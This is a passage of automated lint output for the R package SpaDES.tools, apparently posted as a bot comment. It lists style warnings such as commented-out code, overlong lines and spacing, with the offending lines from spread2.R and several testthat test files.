^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:3:47:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L3) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if (grepl(\"VIC-\", Sys.info()[\"nodename\"]))  { # for debugging only\n                                              ^\n```\n[tests/testthat/test-examples.R:4:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L4) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:14:15:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L14) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    setwd(owd)}\n              ^\n```\n[tests/testthat/test-examples.R:16:46:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L16) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if (grepl(\"VIC-\", Sys.info()[\"nodename\"])) { # for debugging only\n                                             ^\n```\n[tests/testthat/test-examples.R:17:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    cat(paste(\"All files exist: \", isTRUE(all(file.exists(exFiles))), \"\\n\"), file = tmpExFile, append = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:22:48:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-examples.R#L22) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (grepl(\"VIC-\", Sys.info()[\"nodename\"])) { # for debugging only\n                                               ^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     